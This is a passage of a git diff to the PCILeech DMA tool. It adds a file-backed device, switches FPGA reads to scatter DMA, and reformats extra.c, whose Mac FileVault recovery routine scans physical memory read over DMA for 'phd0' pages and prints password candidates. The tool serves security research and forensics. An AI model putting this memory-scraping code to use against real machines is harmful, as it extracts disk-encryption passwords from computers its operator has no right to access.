+    PDEVICE_CONTEXT_FILE ctxFile = (PDEVICE_CONTEXT_FILE)ctx->hDevice;
+    if(!ctxFile) { return; }
+    fclose(ctxFile->pFile);
+    LocalFree(ctxFile);
+    ctx->hDevice = 0;
+}
+
+BOOL DeviceFile_Open(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+    PDEVICE_CONTEXT_FILE ctxFile;
+    ctxFile = (PDEVICE_CONTEXT_FILE)LocalAlloc(LMEM_ZEROINIT, sizeof(DEVICE_CONTEXT_FILE));
+    if(!ctxFile) { return FALSE; }
+    // open backing file
+    if(fopen_s(&ctxFile->pFile, ctx->cfg->dev.szFileNameOptTpFile, "rb") || !ctxFile->pFile) { goto fail; }
+    if(_fseeki64(ctxFile->pFile, 0, SEEK_END)) { goto fail; }       // seek to end of file
+    ctxFile->cbFile = _ftelli64(ctxFile->pFile);                    // get current file pointer
+    if(ctxFile->cbFile < 0x1000) { goto fail; }
+    ctxFile->szFileName = ctx->cfg->dev.szFileNameOptTpFile;
+    ctx->hDevice = (HANDLE)ctxFile;
+    // set callback functions and fix up config
+    ctx->cfg->dev.tp = PCILEECH_DEVICE_FILE;
+    ctx->cfg->dev.qwMaxSizeDmaIo = 0x00100000;          // 1MB
+    ctx->cfg->dev.qwAddrMaxNative = ctxFile->cbFile;
+    ctx->cfg->dev.fPartialPageReadSupported = TRUE;
+    ctx->cfg->dev.pfnClose = DeviceFile_Close;
+    ctx->cfg->dev.pfnProbeDMA = DeviceFile_ProbeDMA;
+    ctx->cfg->dev.pfnReadScatterDMA = DeviceFile_ReadScatterDMA;
+    if(ctx->cfg->fVerbose) {
+        printf("DEVICE: Successfully opened file: '%s'.\n", ctx->cfg->dev.szFileNameOptTpFile);
+    }
+    return TRUE;
+fail:
+    if(ctxFile->pFile) { fclose(ctxFile->pFile); }
+    LocalFree(ctxFile);
+    printf("DEVICE: ERROR: Failed opening file: '%s'.\n", ctx->cfg->dev.szFileNameOptTpFile);
+    return FALSE;
+}
diff --git a/pcileech/devicefile.h b/pcileech/devicefile.h
new file mode 100644
index 0000000..7f86217
--- /dev/null
+++ b/pcileech/devicefile.h
@@ -0,0 +1,17 @@
+// devicefile.h : definitions related to dummy device backed by a file.
+//
+// (c) Ulf Frisk, 2018
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#ifndef __DEVICEFILE_H__
+#define __DEVICEFILE_H__
+#include "pcileech.h"
+
+/*
+* Open a "connection" to the file.
+* -- ctx
+* -- result
+*/
+BOOL DeviceFile_Open(_Inout_ PPCILEECH_CONTEXT ctx);
+
+#endif /* __DEVICEFILE_H__ */
diff --git a/pcileech/devicefpga.c b/pcileech/devicefpga.c
index b635325..48b5fbf 100644
--- a/pcileech/devicefpga.c
+++ b/pcileech/devicefpga.c
@@ -17,8 +17,9 @@
 // FPGA defines below.
 //-------------------------------------------------------------------------------
 
-#define FPGA_CMD_VERSION        0x01
-#define FPGA_CMD_ID             0x03
+#define FPGA_CMD_VERSION_MAJOR  0x01
+#define FPGA_CMD_DEVICE_ID      0x03
+#define FPGA_CMD_VERSION_MINOR  0x05
 
 #define ENDIAN_SWAP_WORD(x)     (x = (x << 8) | (x >> 8))
 #define ENDIAN_SWAP_DWORD(x)    (x = (x << 24) | ((x >> 8) & 0xff00) | ((x << 8) & 0xff0000) | (x >> 24))
@@ -107,25 +108,25 @@ const DEVICE_PERFORMANCE PERFORMANCE_PROFILES[PERFORMANCE_PROFILE_MAX + 1] = {
         .SZ_DEVICE_NAME = "AC701 / FT601",
         .PROBE_MAXPAGES = 0x400,
         .RX_FLUSH_LIMIT = 0xfffff000,
-        .MAX_SIZE_RX = 0x24000,
+        .MAX_SIZE_RX = 0x20000,
         .MAX_SIZE_TX = 0x8000,
         .DELAY_PROBE_READ = 500,
         .DELAY_PROBE_WRITE = 0,
         .DELAY_WRITE = 0,
-        .DELAY_READ = 200,
+        .DELAY_READ = 300,
         .RETRY_ON_ERROR = FALSE
     }
 };
 
 typedef struct tdDEVICE_CONTEXT_FPGA {
     WORD wDeviceId;
-    WORD wFpgaVersion;
+    WORD wFpgaVersionMajor;
+    WORD wFpgaVersionMinor;
     WORD wFpgaID;
     BOOL phySupported;
     DEV_CFG_PHY phy;
     DEVICE_PERFORMANCE perf;
     BOOL isPrintTlp;
-    PTLP_CALLBACK_BUF_MRd pMRdBuffer;
     struct {
         PBYTE pb;
         DWORD cb;
@@ -168,7 +169,9 @@ typedef struct tdDEVICE_CONTEXT_FPGA {
             UCHAR ucPipeID
         );
     } dev;
-    BOOL(*hRxTlpCallbackFn)(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted);
+    PVOID pMRdBufferX; // NULL || PTLP_CALLBACK_BUF_MRd || PTLP_CALLBACK_BUF_MRd_2
+    VOID(*hRxTlpCallbackFn)(_Inout_ PVOID pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb);
+    BYTE RxEccBit;
 } DEVICE_CONTEXT_FPGA, *PDEVICE_CONTEXT_FPGA;
 
 // STRUCT FROM FTD3XX.h
@@ -315,13 +318,13 @@ BOOL DeviceFPGA_GetSetPHY(_In_ PDEVICE_CONTEXT_FPGA ctx, _In_ BOOL isUpdate)
         ctx->phy.tp_cfg = 1;
         ctx->phy.tp = 4;
         *(PQWORD)pbTx = _byteswap_uint64(*(PQWORD)&ctx->phy);
-        status = ctx->dev.pfnFT_WritePipe(ctx->dev.hFTDI, 0x02, pbTx, 16, &cbRxTx, NULL);
+        status = ctx->dev.pfnFT_WritePipe(ctx->dev.hFTDI, 0x02, pbTx, sizeof(pbTx), &cbRxTx, NULL);
         if(status) { return FALSE; }
         Sleep(10);
     }
     *(PQWORD)&ctx->phy = 0;
     *(PQWORD)pbTx = 0x7731000000000000; // phy read (3) + cfg (1) + magic (77)
-    status = ctx->dev.pfnFT_WritePipe(ctx->dev.hFTDI, 0x02, pbTx, 16, &cbRxTx, NULL);
+    status = ctx->dev.pfnFT_WritePipe(ctx->dev.hFTDI, 0x02, pbTx, sizeof(pbTx), &cbRxTx, NULL);
     if(status) { return FALSE; }
     Sleep(10);
     status = ctx->dev.pfnFT_ReadPipe(ctx->dev.hFTDI, 0x82, pbRx, 0x1000, &cbRxTx, NULL);
@@ -329,7 +332,7 @@ BOOL DeviceFPGA_GetSetPHY(_In_ PDEVICE_CONTEXT_FPGA ctx, _In_ BOOL isUpdate)
     for(i = 0; i < cbRxTx; i += 32) {
         while(*(PDWORD)(pbRx + i) == 0x55556666) { // skip over ftdi workaround dummy fillers
             i += 4;
-            if(i > cbRxTx - 32) { return FALSE; }
+            if(i + 32 > cbRxTx) { return FALSE; }
         }
         dwStatus = *(PDWORD)(pbRx + i);
         pdwData = (PDWORD)(pbRx + i + 4);
@@ -371,18 +374,21 @@ VOID DeviceFPGA_GetDeviceID_FpgaVersion(_In_ PDEVICE_CONTEXT_FPGA ctx)
 {
     DWORD status;
     DWORD cbTX, cbRX, i, j;
-    PBYTE pbRX = LocalAlloc(0, 0x01000000);
+    PBYTE pbRX;
     DWORD dwStatus, dwData, cdwCfg = 0;
     PDWORD pdwData;
-    BYTE pbTX[24] = {
+    BYTE pbTX[32] = {
         // cfg status: (pcie bus,dev,fn id)
         0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x01, 0x77,
-        // cmd msg: FPGA bitstream version
+        // cmd msg: FPGA bitstream version (major)
         0x00, 0x00, 0x00, 0x00,  0x01, 0x00, 0x03, 0x77,
+        // cmd msg: FPGA bitstream version (minor)
+        0x00, 0x00, 0x00, 0x00,  0x05, 0x00, 0x03, 0x77,
         // cmd msg: FPGA bitstream device id
         0x00, 0x00, 0x00, 0x00,  0x03, 0x00, 0x03, 0x77
     };
-    status = ctx->dev.pfnFT_WritePipe(ctx->dev.hFTDI, 0x02, pbTX, 24, &cbTX, NULL);
+    if(!(pbRX = LocalAlloc(0, 0x01000000))) { return; }
+    status = ctx->dev.pfnFT_WritePipe(ctx->dev.hFTDI, 0x02, pbTX, sizeof(pbTX), &cbTX, NULL);
     if(status) { goto fail; }
     Sleep(10);
     status = ctx->dev.pfnFT_ReadPipe(ctx->dev.hFTDI, 0x82, pbRX, 0x01000000, &cbRX, NULL);
@@ -390,7 +396,7 @@ VOID DeviceFPGA_GetDeviceID_FpgaVersion(_In_ PDEVICE_CONTEXT_FPGA ctx)
     for(i = 0; i < cbRX; i += 32) {
         while(*(PDWORD)(pbRX + i) == 0x55556666) { // skip over ftdi workaround dummy fillers
             i += 4;
-            if(i > cbRX - 32) { goto fail; }
+            if(i + 32 > cbRX) { goto fail; }
         }
         dwStatus = *(PDWORD)(pbRX + i);
         pdwData = (PDWORD)(pbRX + i + 4);
@@ -398,11 +404,16 @@ VOID DeviceFPGA_GetDeviceID_FpgaVersion(_In_ PDEVICE_CONTEXT_FPGA ctx)
         for(j = 0; j < 7; j++) {
             dwData = *pdwData;
             if((dwStatus & 0x03) == 0x03) { // CMD REPLY (or filler)
-                if((dwData >> 24) == FPGA_CMD_VERSION) { // FPGA bitstream version
-                    ctx->wFpgaVersion = (WORD)dwData;
-                }
-                if((dwData >> 24) == FPGA_CMD_ID) { // FPGA bitstream device id
-                    ctx->wFpgaID = (WORD)dwData;
+                switch(dwData >> 24) {
+                    case FPGA_CMD_VERSION_MAJOR:
+                        ctx->wFpgaVersionMajor = (WORD)dwData;
+                        break;
+                    case FPGA_CMD_VERSION_MINOR:
+                        ctx->wFpgaVersionMinor = (WORD)dwData;
+                        break;
+                    case FPGA_CMD_DEVICE_ID:
+                        ctx->wFpgaID = (WORD)dwData;
+                        break;
                 }
             }
             if((dwStatus & 0x03) == 0x01) { // PCIe CFG REPLY
@@ -414,7 +425,7 @@ VOID DeviceFPGA_GetDeviceID_FpgaVersion(_In_ PDEVICE_CONTEXT_FPGA ctx)
             dwStatus >>= 4;
         }
     }
-    ctx->phySupported = (ctx->wFpgaVersion >= 3) ? DeviceFPGA_GetSetPHY(ctx, FALSE) : FALSE;
+    ctx->phySupported = (ctx->wFpgaVersionMajor >= 3) ? DeviceFPGA_GetSetPHY(ctx, FALSE) : FALSE;
 fail:
     LocalFree(pbRX);
 }
@@ -502,7 +513,7 @@ VOID DeviceFPGA_RxTlpSynchronous(_In_ PDEVICE_CONTEXT_FPGA ctx)
     for(i = 0; i < ctx->rxbuf.cb; i += 32) { // index in 64-bit (QWORD)
         while(*(PDWORD)(ctx->rxbuf.pb + i) == 0x55556666) { // skip over ftdi workaround dummy fillers
             i += 4;
-            if(i > ctx->rxbuf.cb - 32) { return; }
+            if(i + 32 > ctx->rxbuf.cb) { return; }
         }
         dwStatus = *(PDWORD)(ctx->rxbuf.pb + i);
         pdwData = (PDWORD)(ctx->rxbuf.pb + i + 4);
@@ -521,10 +532,10 @@ VOID DeviceFPGA_RxTlpSynchronous(_In_ PDEVICE_CONTEXT_FPGA ctx)
                         TLP_Print(pbTlp, cdwTlp << 2, FALSE);
                     }
                     if(ctx->hRxTlpCallbackFn) {
-                        ctx->hRxTlpCallbackFn(ctx->pMRdBuffer, pbTlp, cdwTlp << 2, NULL);
+                        ctx->hRxTlpCallbackFn(ctx->pMRdBufferX, pbTlp, cdwTlp << 2);
                     }
                 } else {
-                    printf("Device Info: SP605 / FT601: Bad PCIe TLP received! Should not happen!\n");
+                    printf("Device Info: FPGA: Bad PCIe TLP received! Should not happen!\n");
                 }
                 cdwTlp = 0;
             }
@@ -534,74 +545,107 @@ VOID DeviceFPGA_RxTlpSynchronous(_In_ PDEVICE_CONTEXT_FPGA ctx)
     }
 }
 
-BOOL DeviceFPGA_ReadDMA_Impl(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb)
+VOID DeviceFPGA_ReadScatterDMA_Impl(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAs, _In_ DWORD cpDMAs)
 {
     PDEVICE_CONTEXT_FPGA ctx = (PDEVICE_CONTEXT_FPGA)ctxPcileech->hDevice;
-    TLP_CALLBACK_BUF_MRd rxbuf;
-    DWORD tx[4], o, i;
-    BOOL is32, isFlush;
+    TLP_CALLBACK_BUF_MRd_SCATTER rxbuf;
+    DWORD tx[4] = { 0 };
+    DWORD o, i, j, cb, cbFlush, cbTotalInCycle = 0;
+    BOOL isAlgorithmReadTiny;
+    BOOL is32;
     PTLP_HDR_MRdWr64 hdrRd64 = (PTLP_HDR_MRdWr64)tx;
     PTLP_HDR_MRdWr32 hdrRd32 = (PTLP_HDR_MRdWr32)tx;
-    if(cb > ctx->perf.MAX_SIZE_RX) { return FALSE; }
-    if(qwAddr % 0x1000) { return FALSE; }
-    if((cb >= 0x1000) && (cb % 0x1000)) { return FALSE; }
-    if((cb < 0x1000) && (cb % 0x8)) { return FALSE; }
-    // prepare
-    rxbuf.cb = 0;
-    rxbuf.pb = pb;
-    rxbuf.cbMax = cb;
-    ctx->pMRdBuffer = &rxbuf;
-    ctx->hRxTlpCallbackFn = TLP_CallbackMRd;
-    // transmit TLPs
-    for(o = 0; o < cb; o += 0x1000) {
-        memset(tx, 0, 16);
-        is32 = qwAddr + o < 0x100000000;
-        if(is32) {
-            hdrRd32->h.TypeFmt = TLP_MRd32;
-            hdrRd32->h.Length = (WORD)((cb < 0x1000) ? cb >> 2 : 0);
-            hdrRd32->RequesterID = ctx->wDeviceId;
-            hdrRd32->Tag = (BYTE)(o >> 12);
-            hdrRd32->FirstBE = 0xf;
-            hdrRd32->LastBE = 0xf;
-            hdrRd32->Address = (DWORD)(qwAddr + o);
-        } else {
-            hdrRd64->h.TypeFmt = TLP_MRd64;
-            hdrRd64->h.Length = (WORD)((cb < 0x1000) ? cb >> 2 : 0);
-            hdrRd64->RequesterID = ctx->wDeviceId;
-            hdrRd64->Tag = (BYTE)(o >> 12);
-            hdrRd64->FirstBE = 0xf;
-            hdrRd64->LastBE = 0xf;
-            hdrRd64->AddressHigh = (DWORD)((qwAddr + o) >> 32);
-            hdrRd64->AddressLow = (DWORD)(qwAddr + o);
-        }
-        for(i = 0; i < 4; i++) {
-            ENDIAN_SWAP_DWORD(tx[i]);
-        }
-        isFlush = ((o % ctx->perf.RX_FLUSH_LIMIT) == (ctx->perf.RX_FLUSH_LIMIT - 0x1000));
-        if(isFlush) {
-            DeviceFPGA_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, TRUE);
-            usleep(ctx->perf.DELAY_WRITE);
-        } else {
-            DeviceFPGA_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, FALSE);
+    PDMA_IO_SCATTER_HEADER pDMA;
+    BYTE bTag;
+    isAlgorithmReadTiny = (1 == ctxPcileech->cfg->DeviceOpt[3].qwValue);
+    i = 0;
+    ctx->pMRdBufferX = &rxbuf;
+    while(i < cpDMAs) {
+        // Prepare callback buffer
+        ctx->RxEccBit = ctx->RxEccBit ? 0 : 1;
+        rxbuf.bEccBit = ctx->RxEccBit;
+        rxbuf.cbReadTotal = 0;
+        rxbuf.cph = cpDMAs - i;
+        rxbuf.pph = ppDMAs + i;
+        ctx->hRxTlpCallbackFn = TLP_CallbackMRd_Scatter;
+        // Transmit TLPs
+        cbFlush = 0;
+        cbTotalInCycle = 0;
+        bTag = (ctx->RxEccBit ? 0x80 : 0) + (isAlgorithmReadTiny ? 0x40 : 0);
+        for(; i < cpDMAs; i++) {
+            pDMA = *(ppDMAs + i);
+            if((pDMA->cbMax <= pDMA->cb) || (pDMA->cbMax % 8) || (pDMA->cbMax > 0x1000)) { // already completed or unsupported size -> skip over
+                bTag += isAlgorithmReadTiny ? 0x20 : 1;
+                if(!(bTag & 0x3f)) { break; }
+                continue;
+            }
+            cbTotalInCycle += pDMA->cbMax;
+            if(cbTotalInCycle > ctx->perf.MAX_SIZE_RX) { break; } // over max size -> break loop and read result
+            o = 0;
+            while(o < pDMA->cbMax) {
+                cb = isAlgorithmReadTiny ? 0x80 : pDMA->cbMax;
+                is32 = pDMA->qwA + o < 0x100000000;
+                if(is32) {
+                    hdrRd32->h.TypeFmt = TLP_MRd32;
+                    hdrRd32->h.Length = (WORD)((cb < 0x1000) ? cb >> 2 : 0);
+                    hdrRd32->RequesterID = ctx->wDeviceId;
+                    hdrRd32->Tag = bTag;
+                    hdrRd32->FirstBE = 0xf;
+                    hdrRd32->LastBE = 0xf;
+                    hdrRd32->Address = (DWORD)(pDMA->qwA + o);
+                } else {
+                    hdrRd64->h.TypeFmt = TLP_MRd64;
+                    hdrRd64->h.Length = (WORD)((cb < 0x1000) ? cb >> 2 : 0);
+                    hdrRd64->RequesterID = ctx->wDeviceId;
+                    hdrRd64->Tag = bTag;
+                    hdrRd64->FirstBE = 0xf;
+                    hdrRd64->LastBE = 0xf;
+                    hdrRd64->AddressHigh = (DWORD)((pDMA->qwA + o) >> 32);
+                    hdrRd64->AddressLow = (DWORD)(pDMA->qwA + o);
+                }
+                for(j = 0; j < 4; j++) {
+                    ENDIAN_SWAP_DWORD(tx[j]);
+                }
+                cbFlush += cb;
+                if((cbFlush >= ctx->perf.RX_FLUSH_LIMIT) || (isAlgorithmReadTiny && (cbFlush >= 0x1000))) {
+                    DeviceFPGA_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, TRUE);
+                    usleep(ctx->perf.DELAY_WRITE);
+                    cbFlush = 0;
+                } else {
+                    DeviceFPGA_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, FALSE);
+                }
+                o += cb;
+                bTag++;
+            }
+            if(isAlgorithmReadTiny && ((bTag & 0x3f) < 0x20)) { bTag = 0x20; }
+            if(!(bTag & 0x3f)) { break; }
         }
+        // Receive TLPs
+        DeviceFPGA_TxTlp(ctx, NULL, 0, TRUE, TRUE);
+        usleep(ctx->perf.DELAY_READ);
+        DeviceFPGA_RxTlpSynchronous(ctx);
     }
-    DeviceFPGA_TxTlp(ctx, NULL, 0, TRUE, TRUE);
-    usleep(ctx->perf.DELAY_READ);
-    DeviceFPGA_RxTlpSynchronous(ctx);
-    ctx->pMRdBuffer = NULL;
-    return rxbuf.cb >= rxbuf.cbMax;
+    ctx->pMRdBufferX = NULL;
 }
 
-BOOL DeviceFPGA_ReadDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb)
+VOID DeviceFPGA_ReadScatterDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAs, _In_ DWORD cpDMAs, _Out_opt_ PDWORD pchDMAsRead)
 {
     PDEVICE_CONTEXT_FPGA ctx = (PDEVICE_CONTEXT_FPGA)ctxPcileech->hDevice;
-    BOOL result;
-    result = DeviceFPGA_ReadDMA_Impl(ctxPcileech, qwAddr, pb, cb);
-    if(!result && (cb <= 0x1000) && ctx->perf.RETRY_ON_ERROR) {
-        Sleep(100);
-        result = DeviceFPGA_ReadDMA_Impl(ctxPcileech, qwAddr, pb, cb);
+    DWORD i = 0, c = 0;
+    DeviceFPGA_ReadScatterDMA_Impl(ctxPcileech, ppDMAs, cpDMAs);
+    if(pchDMAsRead || ctx->perf.RETRY_ON_ERROR) {
+        while(i < cpDMAs) {
+            if((ppDMAs[i]->cb < ppDMAs[i]->cbMax) && ctx->perf.RETRY_ON_ERROR) {
+                Sleep(100);
+                DeviceFPGA_ReadScatterDMA_Impl(ctxPcileech, ppDMAs, cpDMAs);
+            }
+            c += (ppDMAs[i]->cb >= ppDMAs[i]->cbMax) ? 1 : 0;
+            i++;
+        }
+    }
+    if(pchDMAsRead) {
+        *pchDMAsRead = c;
     }
-    return result;
 }
 
 VOID DeviceFPGA_ProbeDMA_Impl(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qwAddr, _In_ DWORD cPages, _Inout_ __bcount(cPages) PBYTE pbResultMap)
@@ -624,7 +668,7 @@ VOID DeviceFPGA_ProbeDMA_Impl(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD
     bufMRd.cb = 0;
     bufMRd.pb = pbResultMap;
     bufMRd.cbMax = cPages;
-    ctx->pMRdBuffer = &bufMRd;
+    ctx->pMRdBufferX = &bufMRd;
     ctx->hRxTlpCallbackFn = TLP_CallbackMRdProbe;
     // transmit TLPs
     for(i = 0; i < cPages; i++) {
@@ -664,7 +708,7 @@ VOID DeviceFPGA_ProbeDMA_Impl(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD
     usleep(ctx->perf.DELAY_PROBE_READ);
     DeviceFPGA_RxTlpSynchronous(ctx);
     ctx->hRxTlpCallbackFn = NULL;
-    ctx->pMRdBuffer = NULL;
+    ctx->pMRdBufferX = NULL;
 }
 
 VOID DeviceFPGA_ProbeDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qwAddr, _In_ DWORD cPages, _Inout_ __bcount(cPages) PBYTE pbResultMap)
@@ -794,7 +838,7 @@ BOOL DeviceFPGA_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
     ctx->txbuf.cbMax = ctx->perf.MAX_SIZE_TX + 0x10000;
     ctx->txbuf.pb = LocalAlloc(0, ctx->txbuf.cbMax);
     if(!ctx->txbuf.pb) { goto fail; }
-    ctx->isPrintTlp = ctxPcileech->cfg->fVerboseExtra;
+    ctx->isPrintTlp = ctxPcileech->cfg->fVerboseExtraTlp;
     // set callback functions and fix up config
     ctxPcileech->cfg->dev.tp = PCILEECH_DEVICE_FPGA;
     ctxPcileech->cfg->dev.qwMaxSizeDmaIo = ctx->perf.MAX_SIZE_RX;
@@ -802,13 +846,22 @@ BOOL DeviceFPGA_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
     ctxPcileech->cfg->dev.fPartialPageReadSupported = TRUE;
     ctxPcileech->cfg->dev.pfnClose = DeviceFPGA_Close;
     ctxPcileech->cfg->dev.pfnProbeDMA = ctx->perf.PROBE_MAXPAGES ? DeviceFPGA_ProbeDMA : NULL;
-    ctxPcileech->cfg->dev.pfnReadDMA = DeviceFPGA_ReadDMA;
+    ctxPcileech->cfg->dev.pfnReadScatterDMA = DeviceFPGA_ReadScatterDMA;
     ctxPcileech->cfg->dev.pfnWriteDMA = DeviceFPGA_WriteDMA;
     ctxPcileech->cfg->dev.pfnWriteTlp = DeviceFPGA_WriteTlp;
     ctxPcileech->cfg->dev.pfnListenTlp = DeviceFPGA_ListenTlp;
     // return
     if(ctxPcileech->cfg->fVerbose) { 
-        printf("FPGA: Device Info: %s PCIe gen%i x%i [%i,%i,%i]\n", ctx->perf.SZ_DEVICE_NAME, DeviceFPGA_PHY_GetPCIeGen(ctx), DeviceFPGA_PHY_GetLinkWidth(ctx), ctx->perf.DELAY_READ, ctx->perf.DELAY_WRITE, ctx->perf.DELAY_PROBE_READ);
+        printf(
+            "FPGA: Device Info: %s PCIe gen%i x%i [%i,%i,%i] [v%i.%i]\n", 
+            ctx->perf.SZ_DEVICE_NAME, 
+            DeviceFPGA_PHY_GetPCIeGen(ctx), 
+            DeviceFPGA_PHY_GetLinkWidth(ctx), 
+            ctx->perf.DELAY_READ, 
+            ctx->perf.DELAY_WRITE, 
+            ctx->perf.DELAY_PROBE_READ,
+            ctx->wFpgaVersionMajor,
+            ctx->wFpgaVersionMinor);
     }
     return TRUE;
 fail:
diff --git a/pcileech/executor.c b/pcileech/executor.c
index 74f7b41..f9c19a0 100644
--- a/pcileech/executor.c
+++ b/pcileech/executor.c
@@ -233,7 +233,7 @@ BOOL Exec_ExecSilent(_Inout_ PPCILEECH_CONTEXT ctx, _In_ LPSTR szShellcodeName,
 	//------------------------------------------------
 	// 5: Display/Write additional output.
 	//------------------------------------------------
-	if(pcbOut) {
+	if(ppbOut && pcbOut) {
 		*pcbOut = pk->dataOutExtraLength;
 		*ppbOut = (PBYTE)LocalAlloc(0, SIZE_PAGE_ALIGN_4K(*pcbOut));
 		if(!*ppbOut) { result = FALSE; goto fail; }
diff --git a/pcileech/extra.c b/pcileech/extra.c
index 4f25907..9733fae 100644
--- a/pcileech/extra.c
+++ b/pcileech/extra.c
@@ -1,6 +1,6 @@
 // extra.c : implementation related various extra functionality such as exploits.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #include "extra.h"
@@ -9,202 +9,221 @@
 
 VOID Extra_MacFVRecover_ReadMemory_Optimized(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PBYTE pb512M)
 {
-	DWORD i, dwOffsets[] = {
-		0x74000000, 0x75000000, 0x76000000, 0x77000000, 0x78000000, 0x79000000, 0x7a000000, 0x7b000000,
-		0x7c000000, 0x7d000000, 0x7e000000, 0x7f000000, 0x80000000, 0x81000000, 0x82000000, 0x83000000,
-		0x84000000, 0x85000000, 0x86000000, 0x87000000, 0x70000000, 0x71000000, 0x72000000, 0x73000000,
-		0x88000000, 0x89000000, 0x8a000000, 0x8b000000, 0x8c000000, 0x8d000000, 0x8e000000, 0x8f000000
-	};
-	for(i = 0; i < sizeof(dwOffsets) / sizeof(DWORD); i++) {
-		DeviceReadDMAEx(ctx, dwOffsets[i], pb512M + dwOffsets[i] - 0x70000000, 0x01000000, NULL, PCILEECH_FLAG_MEM_EX_FASTFAIL);
-	}
+    DWORD i, dwOffsets[] = {
+        0x74000000, 0x75000000, 0x76000000, 0x77000000, 0x78000000, 0x79000000, 0x7a000000, 0x7b000000,
+        0x7c000000, 0x7d000000, 0x7e000000, 0x7f000000, 0x80000000, 0x81000000, 0x82000000, 0x83000000,
+        0x84000000, 0x85000000, 0x86000000, 0x87000000, 0x70000000, 0x71000000, 0x72000000, 0x73000000,
+        0x88000000, 0x89000000, 0x8a000000, 0x8b000000, 0x8c000000, 0x8d000000, 0x8e000000, 0x8f000000
+    };
+    for(i = 0; i < sizeof(dwOffsets) / sizeof(DWORD); i++) {
+        DeviceReadDMAEx(ctx, dwOffsets[i], pb512M + dwOffsets[i] - 0x70000000, 0x01000000, NULL, PCILEECH_FLAG_MEM_EX_FASTFAIL);
+    }
 }
 
 BOOL Extra_MacFVRecover_Analyze(_In_ PBYTE pb512M)
 {
-	DWORD i, o, dwCandidate;
-	PBYTE pb;
-	BOOL isFound = 0;
-	const BYTE CONST_ZERO_32[32] = { 0 };
-	BYTE pbLast[32];
-	for(o = 0; o < 0x20000000; o += 0x1000) {
-		pb = (PBYTE)(pb512M + o);
-		if(*(PDWORD)pb != 0x30646870) { // signature "phd0"
-			continue; // not correct signature -> skip this page.
-		}
-		dwCandidate = 0;
-		for(i = 0x18; i < 0x800; i += 8) {
-			if((*(PQWORD)(pb + i) & 0xff00ff00ff00ff00)) {
-				break; // non ascii chars in qword block -> skip this page.
-			}
-			if(dwCandidate == 0) {
-				if(!*(PQWORD)(pb + i)) {
-					continue; // empty block -> page is still a candidate.
-				}
-				if(0 == pb[i + 6]) {
-					break; // less than 4 chars in pwd candidate -> skip this page.
-				}
-				if(*(PQWORD)(pb + i) == 0x0043005f00520047) {
-					break; // known false positive starts with GR_C -> skip this page.
-				}
-				dwCandidate = i;
-				continue;
-			}
-			if(0 == *(PQWORD)(pb + i)) {
-				if(memcmp(pb + i, CONST_ZERO_32, 32)) {
-					break; // not 32 bytes of zero after pwd candidate -> skip this page.
-				}
-				// password candidate found!!!
-				isFound = TRUE;
-				if(memcmp(pbLast, pb + dwCandidate, 32)) { // duplicate removal
-					memcpy(pbLast, pb + dwCandidate, 32);
-					printf("MAC_FVRECOVER: PASSWORD CANDIDATE: %S\n", (LPWSTR)(pb + dwCandidate));
-				}
-				break;
-			}
-		}
-	}
-	return isFound;
+    DWORD i, o, dwCandidate;
+    PBYTE pb;
+    BOOL isFound = 0;
+    const BYTE CONST_ZERO_32[32] = { 0 };
+    BYTE pbLast[32];
+    memset(pbLast, 0x00, 32);
+    for(o = 0; o < 0x20000000; o += 0x1000) {
+        pb = (PBYTE)(pb512M + o);
+        if(*(PDWORD)pb != 0x30646870) { // signature "phd0"
+            continue; // not correct signature -> skip this page.
+        }
+        dwCandidate = 0;
+        for(i = 0x18; i < 0x800; i += 8) {
+            if((*(PQWORD)(pb + i) & 0xff00ff00ff00ff00)) {
+                break; // non ascii chars in qword block -> skip this page.
+            }
+            if(dwCandidate == 0) {
+                if(!*(PQWORD)(pb + i)) {
+                    continue; // empty block -> page is still a candidate.
+                }
+                if(0 == pb[i + 6]) {
+                    break; // less than 4 chars in pwd candidate -> skip this page.
+                }
+                if(*(PQWORD)(pb + i) == 0x0043005f00520047) {
+                    break; // known false positive starts with GR_C -> skip this page.
+                }
+                dwCandidate = i;
+                continue;
+            }
+            if(0 == *(PQWORD)(pb + i)) {
+                if(memcmp(pb + i, CONST_ZERO_32, 32)) {
+                    break; // not 32 bytes of zero after pwd candidate -> skip this page.
+                }
+                // password candidate found!!!
+                isFound = TRUE;
+                if(memcmp(pbLast, pb + dwCandidate, 32)) { // duplicate removal
+                    memcpy(pbLast, pb + dwCandidate, 32);
+                    printf("MAC_FVRECOVER: PASSWORD CANDIDATE: %S\n", (LPWSTR)(pb + dwCandidate));
+                }
+                break;
+            }
+        }
+    }
+    return isFound;
 }
 
 VOID Extra_MacFVRecover_SetOutFileName(_Inout_ PCONFIG pCfg)
 {
-	SYSTEMTIME st;
-	if(pCfg->szFileOut[0] == 0) {
-		GetLocalTime(&st);
-		_snprintf_s(
-			pCfg->szFileOut,
-			MAX_PATH,
-			_TRUNCATE,
-			"pcileech-mac-fvrecover-%i%02i%02i-%02i%02i%02i.raw",
-			st.wYear,
-			st.wMonth,
-			st.wDay,
